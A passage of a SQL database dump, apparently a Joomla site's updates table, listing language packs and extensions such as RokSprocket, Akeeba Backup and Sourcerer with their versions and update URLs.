e.joomla.org/language/details3/el-GR_details.xml','',''),(24639,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24640,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24641,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24642,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24643,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24644,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24645,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24646,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24647,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24648,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24649,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24650,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24651,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24652,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24653,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24654,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24655,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24656,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24657,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24658,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24659,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24660,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24661,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24662,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24663,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24664,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24665,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24666,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24667,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24668,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24669,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24670,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24671,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24672,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24673,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24674,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24675,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24676,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24677,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24678,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24679,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24680,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24681,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24682,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24683,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24684,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24685,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24686,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24687,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24688,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24689,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24690,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24691,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24692,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24693,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24694,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24695,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24696,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24697,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24698,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24699,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24700,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24701,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24702,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24703,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24704,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24705,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24706,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24707,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24708,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24709,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24710,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24711,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24712,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24713,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24714,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24715,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24716,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24717,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24718,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24719,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24720,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24721,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24722,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24723,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24724,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24725,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24726,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24727,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24728,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24729,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24730,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24731,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24732,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24733,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24734,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24735,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24736,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24737,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24738,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24739,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24740,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24741,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24742,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24743,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24744,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24746,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24747,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24748,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24749,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24750,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24751,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24752,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24753,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24754,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24755,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24756,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24757,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24758,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24759,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24760,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24761,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24762,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24763,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24764,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24765,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24766,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24767,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24768,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24769,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24770,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24771,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24772,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24773,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24774,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24775,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24776,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24777,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24778,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24779,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24780,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24781,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24782,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24783,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24784,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24785,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24786,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24787,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24788,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24789,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24790,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24791,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24792,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24793,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24794,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24795,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24796,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24797,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24798,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24799,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24800,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24801,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24802,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24803,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24804,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24805,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24806,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24807,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24808,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24809,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24810,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24811,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24812,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24813,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24814,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24815,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24816,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24817,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24818,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24819,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24820,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24821,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24822,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24823,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24824,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24825,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24826,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24827,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24828,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24829,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24830,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24831,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24832,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24833,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24834,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24835,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24836,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24837,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24838,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24839,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24840,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24841,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24842,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24843,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24844,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24845,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24846,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24847,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24848,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24849,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24850,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24851,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24852,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24853,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24854,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24855,57,0,'Serbian 